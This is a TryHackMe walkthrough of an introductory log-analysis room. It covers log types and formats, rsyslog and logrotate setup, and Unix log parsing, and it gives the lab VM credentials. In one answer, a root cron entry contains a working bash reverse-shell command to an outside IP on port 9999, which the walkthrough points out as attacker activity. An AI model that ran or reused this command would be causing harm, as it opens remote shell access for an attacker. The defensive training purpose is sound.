Intro to Logs — SOC Level 2 — Log Analysis — TryHackMe Walkthrough
Learn the fundamentals of logging, data sources, collection methods and principles to step into the log analysis world.
Site Link: https://tryhackme.com/r/room/introtologs
Task 1 Introduction
How can we identify malicious activities? What kind of evidence is generated when an intruder breaches a network? Why is it essential to recognise these indicators within our environment?
Logs serve as invaluable records of past events, providing essential insights to address these questions. By preserving an archive of historical activities, we can bolster our security posture and protect our digital assets more effectively.
A comprehensive understanding of logs is crucial for identifying patterns and mitigating potential threats.
As manually examining the vast amount of log data generated by numerous systems and applications can be challenging, it is vital to grasp the intricacies of log analysis and become acquainted with the available tools and techniques.
Log analysis tools and methods empower individuals to interpret historical events and establish a reliable source of historical evidence, streamlining the processing and scrutiny of log data. This efficiency facilitates prompt detection and response to potential incidents or significant events.
By analysing logs as records of historical activities, individuals and organisations can gain essential knowledge, enhancing their overall awareness and preparedness across a wide range of situations.
Learning Objectives
This room covers how logs can be used to record an adversary’s actions, the tools and techniques needed to perform log analysis, and the significance of effectively collecting and analysing logs.
- Understand the importance of logs as a historical activity record for identifying and mitigating potential threats
- Explore various types of logs, logging mechanisms and collection methods across multiple platforms
- Gain hands-on experience detecting and defeating adversaries through log analysis
Recommended Reading
This room will primarily focus on logs and log files using a Linux-based VM. For those interested in Windows-specific event logs, completing the Windows Event Logs room is recommended.
Join us in this exciting journey, where you will develop the expertise needed to fortify the security posture of assets across diverse platforms with logs!
Answer the questions below
I’m ready to learn more about logs.
Task 2 Expanding Perspectives: Logs as Evidence of Historical Activity
Working with Logs: Scenario
Scenario: A web server of SwiftSpend Financial is constantly bombarded with scans from an adversary. As a systems administrator of this organisation tasked to address this predicament, you must identify what the adversary is doing by configuring logging and analysing collected logs.
IMPORTANT: The user damianhall has limited sudo privileges. Issue the command sudo -l to check what commands can be run by this user. These limited commands are all that are needed to complete the subsequent tasks.
Connecting to the machine
Start the virtual machine in split-screen view by clicking the green Start Machine button below.
If the VM is not visible, use the blue Show Split View button at the top-left of the page. Alternatively, using the credentials below, you can connect to the VM via RDP or SSH.
Username damianhall Password Logs321! IP MACHINE_IP
IMPORTANT: The attached VM contains artefacts to help us better understand logs and the implications of their analysis to the detection engineering and incident response practices. Work on the subsequent tasks and experiment with the VM through a case example. Escalation of Privileges is NOT necessary to answer the questions in this room.
In the Heart of Data: Logs
Just as a physical tree’s rings reveal its life story — indicating good years with thick rings and challenging ones with thin — a digital log provides a historical record of system activity.
Both embody a fundamental principle of growth over time and serve as living records in their respective domains — physical and digital.
In the digital world, every interaction with a computer system — from authentication attempts, granting authorisation, accessing a file, and connecting to a network to encountering a system error — will always leave a digital footprint in the form of logs.
Logs are a record of events within a system. These records provide a detailed account of what a system has been doing, capturing a wide range of events such as user logins, file accesses, system errors, network connections, and changes to data or system configurations.
While the specific details may differ based on the type of log, a log entry usually includes the following information:
- A timestamp of when an event was logged
- The name of the system or application that generated the log entry
- The type of event that occurred
- Additional details about the event, such as the user who initiated the event or the device’s IP address that generated the event
This information is typically stored in a log file, which contains aggregated entries of what occurred at any given time on a system.
However, since digital interactions are continuous and fast-paced, the log file’s size may exponentially grow depending on the activities logged on a system.
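To make these fields concrete, a single hypothetical entry in the syslog style shown later in this room might look like the following (the source IP address and port are made up for illustration):

May 31 12:34:56 WEBSRV-02 sshd[2342593]: Accepted password for damianhall from 10.10.10.5 port 53421 ssh2

Here, the timestamp, the generating system (WEBSRV-02) and application (sshd), the event type (a successful authentication), and the additional details (the user and the source IP address) map directly onto the fields listed above.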
The True Power of Logs: Contextual Correlation
A single log entry may seem insignificant on its own. But when log data is aggregated, analysed, and cross-referenced with other sources of information, it becomes a potent investigation tool. Logs can answer critical questions about an event, such as:
- What happened?
- When did it happen?
- Where did it happen?
- Who is responsible?
- Were their actions successful?
- What was the result of their action?
The following hypothetical scenario illustrates this aspect. Suppose a student allegedly accessed inappropriate content on a university network. By reviewing the logs, a systems administrator could then answer each of the questions above: what was accessed, when and from which device it was accessed, and which user was responsible.
The example above emphasises how logs are instrumental in piecing together a complete picture of an event, thereby enhancing our understanding and ability to respond effectively.
Answer the questions below
2.1 What is the name of your colleague who left a note on your Desktop?
Answer: Perry
2.2 What is the full path to the suggested log file for initial investigation?
Answer: /var/log/gitlab/nginx/access.log
Task 3 Types, Formats, and Standards
Log Types
Specific log types can offer a unique perspective on a system’s operation, performance, and security. While there are various log types, we will focus on the most common ones that cover approximately 80% of the typical use cases.
Below is a list of some of the most common log types:
- Application Logs: Messages about specific applications, including status, errors, warnings, etc.
- Audit Logs: Activities related to operational procedures crucial for regulatory compliance.
- Security Logs: Security events such as logins, permissions changes, firewall activity, etc.
- Server Logs: Various logs a server generates, including system, event, error, and access logs.
- System Logs: Kernel activities, system errors, boot sequences, and hardware status.
- Network Logs: Network traffic, connections, and other network-related events.
- Database Logs: Activities within a database system, such as queries and updates.
- Web Server Logs: Requests processed by a web server, including URLs, response codes, etc.
Understanding the various log types, formats, and standards is critical for practical log analysis. It enables an analyst to effectively parse, interpret, and gain insights from log data, facilitating troubleshooting, performance optimisation, incident response, and threat hunting.
Log Formats
A log format defines the structure and organisation of data within a log file. It specifies how the data is encoded, how each entry is delimited, and what fields are included in each row. These formats can vary widely and may fall into three main categories: Semi-structured, Structured, and Unstructured. We’ll explore these categories and illustrate their usage with examples.
- Semi-structured Logs: These logs may contain structured and unstructured data, with predictable components accommodating free-form text. Examples include:
- Syslog Message Format: A widely adopted logging protocol for system and network logs.
- Example of a log file utilising the Syslog Format
damianhall@WEBSRV-02:~/logs$ cat syslog.txt
May 31 12:34:56 WEBSRV-02 CRON[2342593]: (root) CMD ([ -x /etc/init.d/anacron ] && if [ ! -d /run/systemd/system ]; then /usr/sbin/invoke-rc.d anacron start >/dev/null; fi)
- Windows Event Log (EVTX) Format: Proprietary Microsoft log for Windows systems.
- Example of a log file utilising the Windows Event Log (EVTX) Format
PS C:\WINDOWS\system32> Get-WinEvent -Path "C:\Windows\System32\winevt\Logs\Application.evtx"

   ProviderName: Microsoft-Windows-Security-SPP

TimeCreated            Id LevelDisplayName Message
-----------            -- ---------------- -------
31/05/2023 17:18:24 16384 Information      Successfully scheduled Software Protection service for re-start
31/05/2023 17:17:53 16394 Information      Offline downlevel migration succeeded.
- Structured Logs: Following a strict and standardised format, these logs are conducive to parsing and analysis. Typical structured log formats include:
- Field Delimited Formats: Comma-Separated Values (CSV) and Tab-Separated Values (TSV) are formats often used for tabular data.
- Example of a log file utilising CSV Format
damianhall@WEBSRV-02:~/logs$ cat log.csv
"time","user","action","status","ip","uri"
"2023-05-31T12:34:56Z","adversary","GET",200,"34.253.159.159","http://gitlab.swiftspend.finance:80/"
- JavaScript Object Notation (JSON): Known for its readability and compatibility with modern programming languages.
- Example of a log file utilising the JSON Format
damianhall@WEBSRV-02:~/logs$ cat log.json
{"time": "2023-05-31T12:34:56Z", "user": "adversary", "action": "GET", "status": 200, "ip": "34.253.159.159", "uri": "http://gitlab.swiftspend.finance:80/"}
- W3C Extended Log Format (ELF): Defined by the World Wide Web Consortium (W3C), customisable for web server logging. It is typically used by the Microsoft Internet Information Services (IIS) Web Server.
- Example of a log file utilising W3C Extended Log Format (ELF)
damianhall@WEBSRV-02:~/logs$ cat elf.log
#Version: 1.0
#Fields: date time c-ip c-username s-ip s-port cs-method cs-uri-stem sc-status
31-May-2023 13:55:36 34.253.159.159 adversary 34.253.127.157 80 GET /explore 200
- eXtensible Markup Language (XML): Flexible and customisable for creating standardised logging formats.
- Example of a log file utilising an XML Format
damianhall@WEBSRV-02:~/logs$ cat log.xml
<log><time>2023-05-31T12:34:56Z</time><user>adversary</user><action>GET</action><status>200</status><ip>34.253.159.159</ip><url>https://gitlab.swiftspend.finance/</url></log>
- Unstructured Logs: Comprising free-form text, these logs can be rich in context but may pose challenges in systematic parsing. Examples include:
- NCSA Common Log Format (CLF): A standardised web server log format for client requests. It is typically used by the Apache HTTP Server by default.
- Example of a log file utilising NCSA Common Log Format (CLF)
damianhall@WEBSRV-02:~/logs$ cat clf.log
34.253.159.159 - adversary [31/May/2023:13:55:36 +0000] "GET /explore HTTP/1.1" 200 4886
- NCSA Combined Log Format (Combined): An extension of CLF, adding fields like referrer and user agent. It is typically used by Nginx HTTP Server by default.
- Example of a log file utilising NCSA Combined Log Format (Combined)
damianhall@WEBSRV-02:~/logs$ cat combined.log
34.253.159.159 - adversary [31/May/2023:13:55:36 +0000] "GET /explore HTTP/1.1" 200 4886 "http://gitlab.swiftspend.finance/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
IMPORTANT: Custom-defined formats can be crafted to meet specific applications or use cases. These formats provide flexibility but may necessitate specialised parsing tools for effective interpretation and analysis.
Log Standards
A log standard is a set of guidelines or specifications that define how logs should be generated, transmitted, and stored. Log standards may specify the use of particular log formats, but they also cover other aspects of logging, such as what events should be logged, how logs should be transmitted securely, and how long logs should be retained. Examples of log standards include:
- Common Event Expression (CEE): This standard, developed by MITRE, provides a common structure for log data, making it easier to generate, transmit, store, and analyse logs.
- OWASP Logging Cheat Sheet: A guide for developers on building application logging mechanisms, especially related to security logging.
- Syslog Protocol: Syslog is a standard for message logging, allowing separation of the software that generates messages from the system that stores them and the software that reports and analyses them.
- NIST Special Publication 800–92: This publication provides guidance on computer security log management.
- Azure Monitor Logs: Guidelines for log monitoring on Microsoft Azure.
- Google Cloud Logging: Guidelines for logging on the Google Cloud Platform (GCP).
- Oracle Cloud Infrastructure Logging: Guidelines for logging on the Oracle Cloud Infrastructure (OCI).
- Virginia Tech — Standard for Information Technology Logging: Sample log review and compliance guideline.
Answer the questions below
3.1 Based on the list of log types in this task, what log type is used by the log file specified in the note from Task 2?
The log file suggested in the note is located under /var/log/gitlab/nginx/, and since GitLab is a web-based application served through Nginx, the logs it generates fall under Web Server Logs. These logs typically record requests made to the GitLab web server, including access information, URLs, response codes, and other related events.
Answer: Web Server Logs
3.2 Based on the list of log formats in this task, what log format is used by the log file specified in the note from Task 2?
The logs use the NCSA Combined Log Format. This is a common way web servers record details, such as who visited the website, what they did, when they did it, and the web browser they used.
Answer: Combined
Task 4 Collection, Management, and Centralisation
Log Collection
Log collection is an essential component of log analysis, involving the aggregation of logs from diverse sources such as servers, network devices, software, and databases.
For logs to effectively represent a chronological sequence of events, it’s crucial to maintain the system’s time accuracy during logging. Utilising the Network Time Protocol (NTP) is a method to achieve this synchronisation and ensure the integrity of the timeline stored in the logs.
As this is a foundational step in ensuring that a security analyst has a comprehensive data set to review, the following is a simple step-by-step process for achieving it, bearing in mind the need to prioritise collection based on the most significant information:
- Identify Sources: List all potential log sources, such as servers, databases, applications, and network devices.
- Choose a Log Collector: Opt for a suitable log collector tool or software that aligns with your infrastructure.
- Configure Collection Parameters: Ensure that time synchronisation is enabled through NTP to maintain accurate timelines, adjust settings to determine which events to log at what intervals, and prioritise based on importance.
- Test Collection: Once configured, run a test to ensure logs are appropriately collected from all sources.
IMPORTANT: Please be aware that NTP-based time synchronisation may not be possible to replicate with the VM since it has no internet connectivity. However, when performing this in practice, using pool.ntp.org to find an NTP server is best. Time synchronisation can be performed automatically on Linux-based systems or manually initiated by executing ntpdate pool.ntp.org.
Example of Time Synchronisation with NTP on a Linux-based System
root@WEBSRV-02:~# ntpdate pool.ntp.org
12 Aug 21:03:44 ntpdate[2399365]: adjust time server 85.91.1.180 offset 0.000060 sec
root@WEBSRV-02:~# date
Saturday, 12 August, 2023 09:04:55 PM UTC
root@WEBSRV-02:~#
Log Management
Efficient log management ensures that every gathered log is stored securely, organised systematically, and ready for swift retrieval. A hybrid approach, retaining all log files while selectively trimming the less relevant ones, can provide a balanced solution.
Once you’ve collated your logs, effective management of them is paramount. These steps can be followed to achieve this:
- Storage: Decide on a secure storage solution, considering factors like retention period and accessibility.
- Organisation: Classify logs based on their source, type, or other criteria for easier access later.
- Backup: Regularly back up your logs to prevent data loss.
- Review: Periodically review logs to ensure they are correctly stored and categorised.
Log Centralisation
Centralisation is pivotal for swift log access, in-depth analysis, and rapid incident response. A unified system allows for efficient log management with tools that offer real-time detection, automatic notifications, and seamless integration with incident management systems.
Centralising your logs can significantly streamline access and analysis. Here’s a simple process for achieving it:
- Choose a Centralised System: Opt for a system that consolidates logs from all sources, such as the Elastic Stack or Splunk.
- Integrate Sources: Connect all your log sources to this centralised system.
- Set Up Monitoring: Utilise tools that provide real-time monitoring and alerts for specified events.
- Integration with Incident Management: Ensure that your centralised system can integrate seamlessly with any incident management tools or protocols you have in place.
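To make the source integration step above concrete, below is a minimal sketch of an rsyslog forwarding rule. The property-based filter syntax mirrors the sshd rule used later in this task, while the file name, destination address, and the choice of TCP on port 514 are assumptions for illustration, not the actual contents of any configuration file on the VM:

# /etc/rsyslog.d/99-example-forward.conf (hypothetical file)
# Forward all cron messages to a central log collector over TCP port 514 (assumed address)
:programname, isequal, "cron" @@10.10.10.101:514

In rsyslog, a single @ before the address forwards messages over UDP, while @@ forwards them over TCP.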
Practical Activity: Log Collection with rsyslog
This activity aims to introduce rsyslog and demonstrate how it can enhance the centralisation and management of logs. As part of the collection process, we will configure rsyslog to log all sshd messages to a specific file, such as /var/log/websrv-02/rsyslog_sshd.log. The steps below can be followed to achieve this:
- Open a Terminal.
- Ensure rsyslog is Installed: You can check if rsyslog is installed by running the command:
sudo systemctl status rsyslog
- Create a Configuration File: Use a text editor to create the following configuration file:
gedit /etc/rsyslog.d/98-websrv-02-sshd.conf, nano /etc/rsyslog.d/98-websrv-02-sshd.conf, vi /etc/rsyslog.d/98-websrv-02-sshd.conf, or vim /etc/rsyslog.d/98-websrv-02-sshd.conf
- Add the Configuration: Add the following lines in /etc/rsyslog.d/98-websrv-02-sshd.conf to direct the sshd messages to the specific log file:
$FileCreateMode 0644
:programname, isequal, "sshd" /var/log/websrv-02/rsyslog_sshd.log
- Save and Close the Configuration File.
- Restart rsyslog: Apply the changes by restarting rsyslog with the command:
sudo systemctl restart rsyslog
- Verify the Configuration: You can verify the configuration works by initiating an SSH connection to localhost via ssh localhost or by checking the log file after a minute or two.
IMPORTANT: If remote forwarding of logs is not configured, tools such as scp/rsync, among others, can be utilised for the manual collection of logs.
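A minimal sketch of such manual collection, assuming a reachable collection host named siem-02 with a writable /collected/websrv-02/ directory (both hypothetical):

# Copy a single log file to the collection host over SSH
scp /var/log/websrv-02/rsyslog_sshd.log analyst@siem-02:/collected/websrv-02/
# Or mirror the whole log directory, only transferring files that have changed
rsync -avz /var/log/websrv-02/ analyst@siem-02:/collected/websrv-02/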
Answer the questions below
4.1 After configuring rsyslog for sshd, what username repeatedly appears in the sshd logs at /var/log/websrv-02/rsyslog_sshd.log, indicating failed login attempts or brute forcing?
Open a Terminal.
Ensure rsyslog is Installed
sudo systemctl status rsyslog
Create a Configuration File
nano /etc/rsyslog.d/98-websrv-02-sshd.conf
Add the Configuration: Add the following lines in /etc/rsyslog.d/98-websrv-02-sshd.conf to direct the sshd messages to the specific log file:
$FileCreateMode 0644
:programname, isequal, "sshd" /var/log/websrv-02/rsyslog_sshd.log
Save and Close the Configuration File
Restart rsyslog
sudo systemctl restart rsyslog
Verify the Configuration
ssh localhost
A terminal session where the user damianhall has successfully logged into an Ubuntu 20.04.6 LTS system (WEBSRV-02).
Now view the log file
cat /var/log/websrv-02/rsyslog_sshd.log
The username that repeatedly appears in the sshd logs at /var/log/websrv-02/rsyslog_sshd.log, indicating failed login attempts or brute forcing, is:
Answer: stansimo
4.2 What is the IP address of SIEM-02 based on the rsyslog configuration file /etc/rsyslog.d/99-websrv-02-cron.conf, which is used to monitor cron messages?
Open and examine the contents of the rsyslog configuration file located at /etc/rsyslog.d/99-websrv-02-cron.conf
cat /etc/rsyslog.d/99-websrv-02-cron.conf
Answer: 10.10.10.101
4.3 Based on the generated logs in /var/log/websrv-02/rsyslog_cron.log, what command is being executed by the root user?
View again the contents of the log file at /var/log/websrv-02/rsyslog_cron.log
cat /var/log/websrv-02/rsyslog_cron.log
Answer: /bin/bash -c "/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1"
This command attempts to establish a reverse shell connection to the IP address 34.253.159.159 on port 9999.
Task 5 Storage, Retention, and Deletion
Log Storage
Logs can be stored in various locations, such as the local system that generates them, a centralised repository, or cloud-based storage.
The choice of storage location typically depends on multiple factors:
- Security Requirements: Ensuring that logs are stored in compliance with organisational or regulatory security protocols.
- Accessibility Needs: How quickly and by whom the logs need to be accessed can influence the choice of storage.
- Storage Capacity: The volume of logs generated may require significant storage space, influencing the choice of storage solution.
- Cost Considerations: The budget for log storage may dictate the choice between cloud-based or local solutions.
- Compliance Regulations: Specific industry regulations governing log storage can affect the choice of storage.
- Retention Policies: The required retention time and ease of retrieval can affect the decision-making process.
- Disaster Recovery Plans: Ensuring the availability of logs even in system failure may require specific storage solutions.
Log Retention
It is vital to recognise that log storage is not infinite. Therefore, a reasonable balance between retaining logs for potential future needs and the storage cost is necessary. Understanding the concepts of Hot, Warm, and Cold storage can aid in this decision-making:
- Hot Storage: Logs from the past 3–6 months that are most accessible. Query speed should be near real-time, depending on the complexity of the query.
- Warm Storage: Logs from six months to 2 years, acting as a data lake, easily accessible but not as immediate as Hot storage.
- Cold Storage: Archived or compressed logs from 2–5 years. These logs are not easily accessible and are usually used for retroactive analysis or scoping purposes.
Managing the cost of storing logs is critical for organisations, and carefully selecting Hot, Warm, or Cold storage strategies can help keep these costs in check.
Log Deletion
Log deletion must be performed carefully to avoid removing logs that could still be of value. The backup of log files, especially crucial ones, is necessary before deletion.
It is essential to have a well-defined deletion policy to ensure compliance with data protection laws and regulations. Log deletion helps to:
- Maintain a manageable size of logs for analysis.
- Comply with privacy regulations, such as GDPR, which require unnecessary data to be deleted.
- Keep storage costs in balance.
Best Practices: Log Storage, Retention and Deletion
- Determine the storage, retention, and deletion policy based on both business needs and legal requirements.
- Regularly review and update the guidelines per changing conditions and regulations.
- Automate the storage, retention, and deletion processes to ensure consistency and avoid human errors.
- Encrypt sensitive logs to protect data.
- Regular backups should be made, especially before deletion.
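As a small sketch of the last point, a log file can be hashed and a compressed copy placed in backup storage before any deletion takes place; the /backup/logs path below is hypothetical:

# Record the file's hash, then store a compressed copy in backup storage
sha256sum /var/log/websrv-02/rsyslog_sshd.log >> /backup/logs/hashes.txt
gzip -c /var/log/websrv-02/rsyslog_sshd.log > /backup/logs/rsyslog_sshd.log.gz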
Practical Activity: Log Management with logrotate
This activity aims to introduce logrotate, a tool that automates log file rotation, compression, and management, ensuring that log files are handled systematically. It allows automatic rotation, compression, and removal of log files. As an example, here's how we can set it up for /var/log/websrv-02/rsyslog_sshd.log:
- Create a Configuration File:
sudo gedit /etc/logrotate.d/98-websrv-02_sshd.conf, sudo nano /etc/logrotate.d/98-websrv-02_sshd.conf, sudo vi /etc/logrotate.d/98-websrv-02_sshd.conf, or sudo vim /etc/logrotate.d/98-websrv-02_sshd.conf
- Define Log Settings:
/var/log/websrv-02/rsyslog_sshd.log {
daily
rotate 30
compress
lastaction
DATE=$(date +"%Y-%m-%d")
echo "$(date)" >> "/var/log/websrv-02/hashes_"$DATE"_rsyslog_sshd.txt"
for i in $(seq 1 30); do
FILE="/var/log/websrv-02/rsyslog_sshd.log.$i.gz"
if [ -f "$FILE" ]; then
HASH=$(/usr/bin/sha256sum "$FILE" | awk '{ print $1 }')
echo "rsyslog_sshd.log.$i.gz "$HASH"" >> "/var/log/websrv-02/hashes_"$DATE"_rsyslog_sshd.txt"
fi
done
systemctl restart rsyslog
endscript
}
- Save and Close the file.
- Manual Execution:
sudo logrotate -f /etc/logrotate.d/98-websrv-02_sshd.conf
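If the rotation succeeds, the compressed copies and the hash manifest written by the lastaction script should appear next to the original log. A quick check, assuming the configuration above, might look like this:

ls -l /var/log/websrv-02/
cat "/var/log/websrv-02/hashes_$(date +%Y-%m-%d)_rsyslog_sshd.txt"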
Answer the questions below
5.1 Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, how many versions of old compressed log file copies will be kept?
Create a Configuration File
sudo nano /etc/logrotate.d/98-websrv-02_sshd.conf
Define Log Settings
/var/log/websrv-02/rsyslog_sshd.log {
daily
rotate 30
compress
lastaction
DATE=$(date +"%Y-%m-%d")
echo "$(date)" >> "/var/log/websrv-02/hashes_"$DATE"_rsyslog_sshd.txt"
for i in $(seq 1 30); do
FILE="/var/log/websrv-02/rsyslog_sshd.log.$i.gz"
if [ -f "$FILE" ]; then
HASH=$(/usr/bin/sha256sum "$FILE" | awk '{ print $1 }')
echo "rsyslog_sshd.log.$i.gz "$HASH"" >> "/var/log/websrv-02/hashes_"$DATE"_rsyslog_sshd.txt"
fi
done
systemctl restart rsyslog
endscript
}
Save and Close the file.
Manual Execution: Running logrotate with the -f flag forces it to immediately rotate the SSH log file according to the settings in the configuration file.
sudo logrotate -f /etc/logrotate.d/98-websrv-02_sshd.conf
View the contents of the configuration file
cat /etc/logrotate.d/99-websrv-02_cron.conf
24 versions of old compressed log file copies will be kept
Answer: 24
5.2 Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, what is the log rotation frequency?
- The configuration specifies hourly, which means the logs are rotated every hour.
Answer: hourly
Task 6 Hands-on Exercise: Log analysis process, tools, and techniques
Logs are more than mere records of historical events; they can serve as a guiding compass. They are invaluable resources that, when skillfully leveraged, can enhance system diagnostics, cyber security, and regulatory compliance efforts. Their role in keeping a record of historical activity for a system or application is crucial.
Log Analysis Process
Log analysis involves Parsing, Normalisation, Sorting, Classification, Enrichment, Correlation, Visualisation, and Reporting. It can be done through various tools and techniques, from complex systems like Splunk and ELK to ad-hoc methods using default command-line tools and open-source utilities.
Data Sources
Data Sources are the systems or applications configured to log system events or user activities. These are the origin of logs.
Parsing
Parsing is breaking down the log data into more manageable and understandable components. Since logs come in various formats depending on the source, it’s essential to parse these logs to extract valuable information.
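As a simple illustration of parsing, the Combined-format entries from Task 3 can be split into individual fields with awk; the field positions below assume that exact format and are shown only as a sketch:

# Print the client IP, request method, and status code from an Nginx combined-format log
awk '{gsub(/"/, "", $6); print $1, $6, $9}' /var/log/gitlab/nginx/access.log | head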
Normalisation
Normalisation is standardising parsed data. It involves bringing the various log data into a standard format, making comparing and analysing data from different sources easier. It is imperative in environments with multiple systems and applications, where each might generate logs in another format.
Sorting
Sorting is a vital aspect of log analysis, as it allows for efficient data retrieval and identification of patterns. Logs can be sorted by time, source, event type, severity, and any other parameter present in the data. Proper sorting is critical in identifying trends and anomalies that signal operational issues or security incidents.
Classification
Classification involves assigning categories to the logs based on their characteristics. By classifying log files, you can quickly filter and focus on those logs that matter most to your analysis. For instance, classification can be based on the severity level, event type, or source. Automated classification using machine learning can significantly enhance this process, helping to identify potential issues or threats that could be overlooked.
Enrichment
Log enrichment adds context to logs to make them more meaningful and easier to analyse. It could involve adding information like geographical data, user details, threat intelligence, or even data from other sources that can provide a complete picture of the event.
Enrichment makes logs more valuable, enabling analysts to make better decisions and more accurately respond to incidents. Like classification, log enrichment can be automated using machine learning, reducing the time and effort required for log analysis.
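A minimal sketch of enrichment using local threat intelligence, assuming a hypothetical intel.txt file containing one known-bad IP address per line and a consolidated log such as the /tmp/parsed_consolidated.log built later in this task:

# Tag every log entry that contains an IP address from the intel list
grep -F -f intel.txt /tmp/parsed_consolidated.log | sed 's/$/ [matches-threat-intel]/' > /tmp/enriched.log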
Correlation
Correlation involves linking related records and identifying connections between log entries. This process helps detect patterns and trends, making understanding complex relationships between various log events easier. Correlation is critical in determining security threats or system performance issues that might remain unnoticed.
Visualisation
Visualisation represents log data in graphical formats like charts, graphs, or heat maps. Visually presenting data makes recognising patterns, trends, and anomalies easier. Visualisation tools provide an intuitive way to interpret large volumes of log data, making complex information more accessible and understandable.
Reporting
Reporting summarises log data into structured formats to provide insights, support decision-making, or meet compliance requirements. Effective reporting includes creating clear and concise log data summaries catering to stakeholders’ needs, such as management, security teams, or auditors. Regular reports can be vital in monitoring system health, security posture, and operational efficiency.
Log Analysis Tools
Security Information and Event Management (SIEM) tools such as Splunk or Elastic Search can be used for complex log analysis tasks.
However, in scenarios where immediate data analysis is needed, such as during incident response, Linux-based systems can employ default tools like cat, grep, sed, sort, uniq, and awk, along with sha256sum for hashing log files. Windows-based systems can utilise EZ-Tools and the default cmdlet Get-FileHash for similar purposes. These tools enable rapid parsing and analysis, which suits these situations.
Additionally, proper acquisition should be observed by taking the log file’s hash during collection to ensure its admissibility in a court of law.
Therefore, it is imperative not only to log events but also to ensure their integrity, that they are analysed, and any lessons obtained from the logs be learned, as the safety and efficiency of an organisation can depend on them.
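A minimal example of that acquisition step, hashing a log file at collection time and re-verifying it later, might look like this:

# Record the hash at collection time
sha256sum /var/log/gitlab/nginx/access.log > /tmp/access.log.sha256
# Later, confirm the file has not changed since collection
sha256sum -c /tmp/access.log.sha256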
Log Analysis Techniques
Log analysis techniques are methods or practices used to interpret and derive insights from log data. These techniques can range from simple to complex and are vital for identifying patterns, anomalies, and critical insights. Here are some common techniques:
Pattern Recognition: This involves identifying recurring sequences or trends in log data. It can detect regular system behaviour or identify unusual activities that may indicate a security threat.
Anomaly Detection: Anomaly detection focuses on identifying data points that deviate from the expected pattern. It is crucial to spot potential issues or malicious activities early on.
Correlation Analysis: Correlating different log entries helps understand the relationship between various events. It can reveal causation and dependencies between system components and is vital in root cause analysis.
Timeline Analysis: Analysing logs over time helps understand trends, seasonalities, and periodic behaviours. It can be essential for performance monitoring and forecasting system loads.
Machine Learning and AI: Leveraging machine learning models can automate and enhance various log analysis techniques, such as classification and enrichment. AI can provide predictive insights and help in automating responses to specific events.
Visualisation: Representing log data through graphs and charts allows for intuitive understanding and quick insights. Visualisation can make complex data more accessible and assist in identifying key patterns and relationships.
Statistical Analysis: Using statistical methods to analyse log data can provide quantitative insights and help make data-driven decisions. Regression analysis and hypothesis testing can infer relationships and validate assumptions.
These techniques can be applied individually or in combination, depending on the specific requirements and complexity of the log analysis task. Understanding and using these techniques can significantly enhance the effectiveness of log analysis, leading to more informed decisions and robust security measures.
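As a small illustration of pattern recognition and anomaly detection in practice, counting failed SSH logins per source IP in the log collected in Task 4 quickly surfaces a brute-force pattern; the regular expression simply extracts IPv4 addresses from the matching lines:

grep "Failed password" /var/log/websrv-02/rsyslog_sshd.log | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort | uniq -c | sort -nr | head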
Working with Logs: Practical Application
Working with logs is a complex task requiring both comprehension and manipulation of data. This tutorial covers two scenarios. The first is handling unparsed raw log files accessed directly via an open-source Log Viewer tool. This method allows immediate analysis without preprocessing, which is ideal for quick inspections or preserving the original format.
The second scenario focuses on creating a parsed and consolidated log file using Unix tools like cat, grep, sed, sort, uniq, and awk. It involves merging, filtering, and formatting logs to create a standardised file. Accessible through the Log Viewer tool, this consolidated file offers a clear and efficient view of the data, aiding in identifying patterns and issues.
These approaches highlight the flexibility and significance of log analysis in system diagnostics and cyber security. Whether using raw or parsed logs, the ability to compile, view, and analyse data is vital for an organisation’s safety and efficiency.
Unparsed Raw Log Files
When dealing with raw log files, you can access them directly through the Log Viewer tool by specifying the paths in the URL. Here’s an example URL that includes multiple log files:
http://MACHINE_IP:8111/log?log=%2Fvar%2Flog%2Fgitlab%2Fnginx%2Faccess.log&log=%2Fvar%2Flog%2Fwebsrv-02%2Frsyslog_cron.log&log=%2Fvar%2Flog%2Fwebsrv-02%2Frsyslog_sshd.log&log=%2Fvar%2Flog%2Fgitlab%2Fgitlab-rails%2Fapi_json.log
Paste this URL into your browser to view the unparsed raw log files using the Log Viewer tool.
NOTE: You can access the URL using the AttackBox or VM browser. However, please be aware that Firefox on the VM may take a few minutes to boot up.
Parsed and Consolidated Log File
To create a parsed and consolidated log file, you can use a combination of Unix tools like cat, grep, sed, sort, uniq, and awk. Here's a step-by-step guide:
- Use awk and sed to normalise the log entries to the desired format. For this example, we will sort by date and time:

# Process nginx access log
awk -F'[][]' '{print "[" $2 "]", "--- /var/log/gitlab/nginx/access.log ---", "\"" $0 "\""}' /var/log/gitlab/nginx/access.log | sed "s/ +0000//g" > /tmp/parsed_consolidated.log

# Process rsyslog_cron.log
awk '{ original_line = $0; gsub(/ /, "/", $1); printf "[%s/%s/2023:%s] --- /var/log/websrv-02/rsyslog_cron.log --- \"%s\"\n", $2, $1, $3, original_line }' /var/log/websrv-02/rsyslog_cron.log >> /tmp/parsed_consolidated.log

# Process rsyslog_sshd.log
awk '{ original_line = $0; gsub(/ /, "/", $1); printf "[%s/%s/2023:%s] --- /var/log/websrv-02/rsyslog_sshd.log --- \"%s\"\n", $2, $1, $3, original_line }' /var/log/websrv-02/rsyslog_sshd.log >> /tmp/parsed_consolidated.log

# Process gitlab-rails/api_json.log
awk -F'"' '{timestamp = $4; converted = strftime("[%d/%b/%Y:%H:%M:%S]", mktime(substr(timestamp, 1, 4) " " substr(timestamp, 6, 2) " " substr(timestamp, 9, 2) " " substr(timestamp, 12, 2) " " substr(timestamp, 15, 2) " " substr(timestamp, 18, 2) " 0 0")); print converted, "--- /var/log/gitlab/gitlab-rails/api_json.log ---", "\""$0"\""}' /var/log/gitlab/gitlab-rails/api_json.log >> /tmp/parsed_consolidated.log
- Optional: Use grep to filter specific entries:
grep "34.253.159.159" /tmp/parsed_consolidated.log > /tmp/filtered_consolidated.log
- Use sort to sort all the log entries by date and time:
sort /tmp/parsed_consolidated.log > /tmp/sort_parsed_consolidated.log
- Use uniq to remove duplicate entries:
uniq /tmp/sort_parsed_consolidated.log > /tmp/uniq_sort_parsed_consolidated.log
You can now access the parsed and consolidated log file through the Log Viewer tool using the following URL:
http://MACHINE_IP:8111/log?path=%2Ftmp%2Funiq_sort_parsed_consolidated.log
NOTE: You can access the URL using the AttackBox or VM browser. However, please be aware that Firefox on the VM may take a few minutes to boot up.
Answer the questions below
